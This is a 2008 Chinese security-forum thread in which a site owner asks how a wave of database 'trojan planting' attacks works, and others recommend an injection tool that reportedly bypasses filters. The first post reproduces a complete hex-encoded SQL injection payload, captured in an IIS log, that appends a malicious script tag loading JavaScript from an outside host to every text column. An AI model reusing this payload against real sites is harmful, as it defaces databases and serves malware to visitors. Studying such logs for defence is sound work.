[讨论]最近流行的数据库挂马方式讨论?
[url=http://forum.eviloctal.com/misc.php?action=viewratings&tid=33191&pid=143393][img]http://forum.eviloctal.com/images/default/disagree.gif[/img][/url][讨论]最近流行的数据库挂马方式讨论?
很多站被黑.挂了
0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D
这么一句,大家可以google上下,
还原</title>"><scrip</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
我抓的IIS的日志
---------- EX080518.LOG
2008-05-18 00:02:13 W3SVC337328992 125.76.230.26 GET /co/mb/pdview.asp pdid=59294;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 211.99.31.176 Mozilla/4.0 200 0 1236
很奇怪,为什么加了防注脚本,对这些危险的字符都过滤了,而且自己也测试了无法成功, 这个是怎么插入的,? 我也想知道用什么办法解决,不过一般都是把注入点找出来,然后sql限制比较好
帖子2 精华[url=http://forum.eviloctal.com/digest.php?authorid=164082]0[/url] 积分2 阅读权限40 在线时间1 小时 注册时间2008-6-2 最后登录2008-7-12 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=164082]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=33191&repquote=143748&extra=page%3D3&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33191&pid=143748&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-108943.html]憶楓[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 最近好象出了新的饿注入软件 可以突破防注入程序
管中窥豹 注入工具 [url=http://gzkb.goomoo.cn]http://gzkb.goomoo.cn[/url]
你们可以去看看
帖子14 精华[url=http://forum.eviloctal.com/digest.php?authorid=108943]0[/url] 积分41 阅读权限40 在线时间4 小时 注册时间2007-4-17 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=108943]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=33191&repquote=143767&extra=page%3D3&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33191&pid=143767&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-164082.html]viva88[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 请问哪里有管中窥豹下载呢.呵呵.
帖子2 精华[url=http://forum.eviloctal.com/digest.php?authorid=164082]0[/url] 积分2 阅读权限40 在线时间1 小时 注册时间2008-6-2 最后登录2008-7-12 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=164082]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=33191&repquote=143899&extra=page%3D3&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33191&pid=143899&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-160174.html]风尘秀吉[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 不知道那个管中窥豹有没后门和绑马
如果没有 实为大作
帖子18 精华[url=http://forum.eviloctal.com/digest.php?authorid=160174]0[/url] 积分44 阅读权限40 在线时间137 小时 注册时间2008-3-5 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=160174]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=33191&repquote=143995&extra=page%3D3&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33191&pid=143995&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]
[url=http://forum.eviloctal.com/space-uid-947.html]fhod[/url] [img]http://forum.eviloctal.com/customavatars/947.jpg[/img]
运维管理组
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 引用:
原帖由 憶楓 于 2008-6-3 05:55 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=143767&ptid=33191][img]http://forum.eviloctal.com/images/common/back.gif[/img][/url]
最近好象出了新的饿注入软件 可以突破防注入程序
管中窥豹 注入工具 [url=http://gzkb.goomoo.cn]http://gzkb.goomoo.cn[/url]
你们可以去看看
在此我顺便在这里把【管中窥豹】的加密方式简单说一说:【管中窥豹】同时采取了网络验证和usb加密锁双重验证的方式。网络验证采用了多线程互相监守、多线程随即认证、动态数据包加密、反本地模拟服务器等多种技术;usb加密则把软件的重要功能放到usb加密锁中运行,没有加密锁则缺失这些功能;此外还加上数个猛壳、字符串加密、CRC校验、反脱壳等等,要破解,几乎是不可能的任务。
共享软件很容易被破解倒是真的。
我想破解版大概会在2050年上市吧。
作者: 古木系统安全
牛人哇..这也太牛比了...没准哪天就让人破了处
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url]
帖子899 精华[url=http://forum.eviloctal.com/digest.php?authorid=947]16[/url] 积分6857 阅读权限150 性别男 在线时间534 小时 注册时间2004-12-6 最后登录2008-7-18 [url=http://www.ciker.org/]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=947]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=33191&repquote=144014&extra=page%3D3&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33191&pid=144014&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]
[url=http://forum.eviloctal.com/space-uid-61423.html]攻击者[/url] [img]http://forum.eviloctal.com/images/avatars/pw/male2.gif[/img]
晶莹剔透§烈日灼然
页:
[1]